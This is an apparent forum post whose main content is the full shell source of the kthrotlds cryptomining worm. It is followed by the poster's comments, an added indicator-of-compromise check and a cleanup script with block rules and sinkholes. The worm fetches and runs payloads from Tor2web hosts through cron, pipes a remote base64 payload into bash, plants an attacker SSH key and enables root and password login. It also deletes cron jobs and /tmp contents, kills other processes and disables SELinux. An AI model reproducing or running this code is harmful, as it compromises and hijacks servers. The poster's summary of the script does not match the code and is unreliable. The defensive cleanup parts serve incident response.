#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
# Use sudo when not root and it works without a password prompt.
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; }
fi
# Re-exec itself under nohup (with the -n marker) so it outlives the caller's shell.
if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then
    ${sudo} chmod +x "$0"
    nohup ${sudo} "$0" -n >/dev/null 2>&1 &
    echo 'Sent!'
    exit $?
fi
# Pick the first writable working directory (~/.cache preferred) and make it append-only.
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
touch "/tmp/.${rand}" >/dev/null 2>&1 && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
touch "/usr/local/bin/.${rand}" >/dev/null 2>&1 && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
touch "${HOME}/.${rand}" >/dev/null 2>&1 && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1
# C1: per-user crontab entry (every 9 min); C2: system crontab entry with a user field (every 11 min).
C1="*/9 * * * * (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
C2="*/11 * * * * root (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
if [ "$(whoami)" != "root" ]; then sshdir="/${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
${sudo} rm -f /tmp/* >/dev/null 2>&1
${sudo} rm -f /tmp/.* >/dev/null 2>&1
# Kill competing miners and bots by name (two lists), sparing its own kthrotlds/.ntp.
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
# Then anything (except java/jenkins) using 54% CPU or more: assumed to be a rival miner.
hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
#${sudo} pkill sleep >/dev/null 2>&1
#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)
#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi
# Grep every running executable for miner strings; kill and delete matches.
hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)
if [ "${hload2}" != "" ]; then
    for p in ${hload2}; do
        xm=''
        if [ $p -gt 301 ]; then
            if [ -f /proc/${p}/exe ]; then
                xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)
            elif [ -f /proc/${p}/comm ]; then
                xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
                xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
            fi
            if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi
        fi
    done
fi
others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')
if [ "${others}" != "" ]; then
    for o in ${others}; do
        okill=0
        if [ -f "${o}" ]; then
            if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
            if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
            if [ ${okill} -eq 1 ]; then
                ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
                ${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
            fi
        fi
    done
fi
net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
    unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
    http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi
# Everything below needs root: remove LD_PRELOAD hooks, hosts-file sinkholes and all existing cron jobs.
if [ ${sudoer} -eq 1 ]; then
    if [ -f /etc/ld.so.preload ]; then
        if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
        ${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
        >/tmp/.ld.so >/dev/null 2>&1
        ${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
    fi
    #${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;
    if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
    [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }
    [ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
    if [ -f /usr/bin/yum ]; then
        if [ -f /usr/bin/systemctl ]; then
            crstart="systemctl restart crond.service >/dev/null 2>&1"
            crstop="systemctl stop crond.service >/dev/null 2>&1"
        else
            crstart="/etc/init.d/crond restart >/dev/null 2>&1"
            crstop="/etc/init.d/crond stop >/dev/null 2>&1"
        fi
    elif [ -f /usr/bin/apt-get ]; then
        crstart="service cron restart >/dev/null 2>&1"
        crstop="service cron stop >/dev/null 2>&1"
    elif [ -f /usr/bin/pacman ]; then
        crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
        crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
    elif [ -f /sbin/apk ]; then
        crstart="/etc/init.d/crond restart >/dev/null 2>&1"
        crstop="/etc/init.d/crond stop >/dev/null 2>&1"
    fi
    # Install (or reinstall) the tools it depends on: sshd, cron, curl/wget, e2fsprogs for chattr.
    if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then
        if [ -f /usr/bin/yum ]; then
            yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
            yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
            chkconfig sshd on >/dev/null 2>&1
            chkconfig crond on >/dev/null 2>&1;
            if [ -f /usr/bin/systemctl ]; then
                systemctl start sshd.service >/dev/null 2>&1
            else
                /etc/init.d/sshd start >/dev/null 2>&1
            fi
        elif [ -f /usr/bin/apt-get ]; then
            rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
            if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
            DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
            ${sudo} systemctl enable ssh
            ${sudo} systemctl enable cron
            ${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
        elif [ -f /usr/bin/pacman ]; then
            pacman -Syy >/dev/null 2>&1
            pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
            systemctl enable --now cronie.service >/dev/null 2>&1
            systemctl enable --now sshd.service >/dev/null 2>&1
            /etc/rc.d/sshd restart >/dev/null 2>&1
        elif [ -f /sbin/apk ]; then
            #apk --no-cache -f upgrade >/dev/null 2>&1
            apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
            apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
            apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
            rc-update add sshd >/dev/null 2>&1
            /etc/init.d/sshd start >/dev/null 2>&1
            if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
        fi
    fi
    # Wipe every cron location (clearing i/a attributes first), then write its own entries.
    ${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
    ${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;
    ${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
    ${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1;
    ${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
    ${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
    if [ -f /sbin/apk ]; then
        ${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
        ${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
    elif [ -f /usr/bin/apt-get ]; then
        ${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
    else
        ${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
        rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
        if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
    fi
    ${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
    if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
    ${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
    rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)
    # If the entry still isn't in `crontab -l`, assume crontab was tampered with and swap in busybox copies.
    if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
        (${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
        if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then
            ${sudo} "${crstop}"
            cd=$(which crond)
            ct=$(which crontab)
            #if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi
            if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
            ${sudo} "${crstart}"
        fi
    fi
    # Plant the SSH key, make authorized_keys immutable, and make sure root can log in with it.
    ${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
    if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
    ${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
    if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
    if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi
    ${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
    [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }

? ? [ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }

? ? touch "${LPATH}.sysud"

else

? ? if [ $(which crontab|wc -l) -ne 0 ]; then

? ? ? ? crontab -r >/dev/null 2>&1

? ? ? ? (crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -

? ? fi

fi

rm -rf ./main* >/dev/null 2>&1

rm -rf ./*.ico* >/dev/null 2>&1

rm -rf ./r64* >/dev/null 2>&1

rm -rf ./r32* >/dev/null 2>&1

echo -e '\n'

(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)

if [ ${sudoer} -eq 1 ]; then

? ? if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then

? ? ? ? ${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }

? ? ? ? ${sudo} shutdown -r now >/dev/null 2>&1

? ? ? ? ${sudo} reboot -f >/dev/null 2>&1

? ? fi

? ? if echo "$(sestatus -v? 2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi

fi

```

This is a shell script of 200-odd lines, and I have not fully understood it. What I can roughly make out is that it probes Redis on port 6379 for a password, blocks some key Linux commands, and after the compromise starts port-scanning other machines. I have the code now, but I still don't know how to remove it completely :(

Recording it here.
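The persistence the script above leaves behind is all in files (cron entries naming the Tor2web host, the planted SSH key, the sshd_config lines appended at the end, and the ld.so.preload rootkit that the cleanup script below removes). The following triage helper is an added example, not part of the original post or of the worm, that checks those artifacts under a root directory so it can be run against a mounted disk image or a copied /etc and /root as well as on a live host. The C2 hostname is the one from the download URLs; the paths checked and the constructed sample tree are assumptions made for this example.

```shell
#!/bin/sh
# Added triage helper (example code, not from the original post or the worm).
# Looks for the persistence artifacts the worm installs, under the root given
# as argument. The constructed sample tree below stands in for an infected host.

C2='an7kmd2wp4xo7hpr'   # Tor2web hostname seen in the worm's download URLs
IOC_COUNT=0

# iocs_in_root ROOT: print one line per finding, leave the total in IOC_COUNT
iocs_in_root() {
    root=${1:-/}
    IOC_COUNT=0

    # 1. Every cron location the worm writes to (distro-specific user crontabs,
    #    /etc/crontab and /etc/cron.d/root), matched on the C2 host / Tor2web
    for f in "$root/etc/crontab" "$root/etc/cron.d/root" \
             "$root/var/spool/cron/root" "$root/var/spool/cron/crontabs/root" \
             "$root/etc/crontabs/root"; do
        if [ -f "$f" ] && grep -qiE "$C2|tor2web|\.onion" "$f"; then
            echo "cron      ${f#$root} references the Tor2web download host"
            IOC_COUNT=$((IOC_COUNT + 1))
        fi
    done

    # 2. LD_PRELOAD rootkit (libioset.so in the cleanup script)
    if [ -s "$root/etc/ld.so.preload" ]; then
        echo "preload   /etc/ld.so.preload loads: $(tr '\n' ' ' < "$root/etc/ld.so.preload")"
        IOC_COUNT=$((IOC_COUNT + 1))
    fi

    # 3. Planted SSH key: the worm wipes an authorized_keys that already holds a
    #    key tagged 'redis' and appends its own, so any 'redis' tag is suspect
    ak="$root/root/.ssh/authorized_keys"
    if [ -f "$ak" ] && grep -q 'redis' "$ak"; then
        echo "sshkey    authorized_keys holds a key tagged 'redis'"
        IOC_COUNT=$((IOC_COUNT + 1))
    fi

    # 4. sshd_config: the worm appends 'PermitRootLogin yes' etc. to the end of
    #    the file instead of editing the existing line, so a directive that
    #    appears twice (permissive copy last) is the tell
    cfg="$root/etc/ssh/sshd_config"
    if [ -f "$cfg" ]; then
        for d in PermitRootLogin PasswordAuthentication PubkeyAuthentication; do
            c=$(grep -c "^$d[[:space:]]" "$cfg" || true)
            if [ "$c" -gt 1 ]; then
                echo "sshd      $d set $c times; last value wins: $(grep "^$d[[:space:]]" "$cfg" | tail -n 1)"
                IOC_COUNT=$((IOC_COUNT + 1))
            fi
        done
    fi
    return 0
}

# Constructed sample tree (not a real infected host) so the check runs offline
make_sample_root() {
    r=$(mktemp -d)
    mkdir -p "$r/etc/cron.d" "$r/etc/ssh" "$r/root/.ssh"
    printf '*/15 * * * * root curl -fsSL https://%s.tor2web.su/src/ldm | sh\n' "$C2" > "$r/etc/cron.d/root"
    printf '/usr/local/lib/libioset.so\n' > "$r/etc/ld.so.preload"
    printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDexample redis\n' > "$r/root/.ssh/authorized_keys"
    printf 'PermitRootLogin no\nPasswordAuthentication no\nPermitRootLogin yes\nPasswordAuthentication yes\n' > "$r/etc/ssh/sshd_config"
    echo "$r"
}

# Stand-alone demo against the constructed tree; on a suspect host run: iocs_in_root /
SAMPLE=$(make_sample_root)
iocs_in_root "$SAMPLE"
echo "findings: $IOC_COUNT"
rm -rf "$SAMPLE"
```

Against the sample tree this reports five findings (one cron file, the preload entry, the tagged key and two duplicated sshd directives). On a live host also run `lsattr` on the files it names: the worm sets the immutable bit, so an `rm` that silently fails is itself a finding.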


kthrotlds mining malware.

update: finally cleaned it off.



Cleanup script (assembled from several found online):

```bash
# Stop cron first so the persistence entries cannot respawn the miner mid-cleanup
service crond stop
systemctl stop crond

# Cut the host off from the mining pool and the Tor2web download mirrors
# (iptables resolves these names once, when the rule is inserted)
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.su -j DROP
iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.su -j DROP
iptables -A INPUT -s an7kmd2wp4xo7hpr.tor2web.io -j DROP
iptables -A OUTPUT -d an7kmd2wp4xo7hpr.tor2web.io -j DROP
iptables -A INPUT -s an7kmd2wp4xo7hpr.onion.sh -j DROP
iptables -A OUTPUT -d an7kmd2wp4xo7hpr.onion.sh -j DROP

# Sinkhole the same names (plus pastebin.com and thyrsi.com) in /etc/hosts.
# busybox is used for the file operations because the system binaries may be
# hidden from or hooked by the LD_PRELOAD library removed below
busybox echo -e "\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.su\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.io\n0.0.0.0 an7kmd2wp4xo7hpr.onion.sh" >> /etc/hosts
busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts

# Userland rootkit: the library listed in /etc/ld.so.preload hides the miner's
# files and processes from ls/ps/lsof
busybox rm -f /usr/local/lib/libioset.so
busybox rm -f /usr/local/lib/libcset.so
chattr -i /etc/ld.so.preload && busybox rm -f /etc/ld.so.preload
busybox rm -f /etc/ld.so.cache
ldconfig                                   # regenerate the cache just deleted
lsof | grep usr/local/lib/libioset.so      # check: should print nothing now
echo $LD_PRELOAD                           # check: should be empty

# kerberods dropper: binary, SysV init script (netdns) with its rc links, systemd unit
rm -rf /usr/sbin/kerberods
rm -rf /etc/init.d/netdns
rm -rf /etc/rc.d/rc0.d/K01netdns
rm -rf /etc/rc.d/rc1.d/K01netdns
rm -rf /etc/rc.d/rc2.d/S99netdns
rm -rf /etc/rc.d/rc3.d/S99netdns
rm -rf /etc/rc.d/rc4.d/S99netdns
rm -rf /etc/rc.d/rc5.d/S99netdns
rm -rf /etc/rc.d/rc6.d/K01netdns
rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service
rm -rf /usr/lib/systemd/system/netdns.service
# Only the netdns links are removed: wiping /etc/rc.d/rc*.d/S* and K* wholesale
# would delete every service's start/stop link and leave nothing to boot

# Kill the miner and its loaders by the names they have been seen under
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9
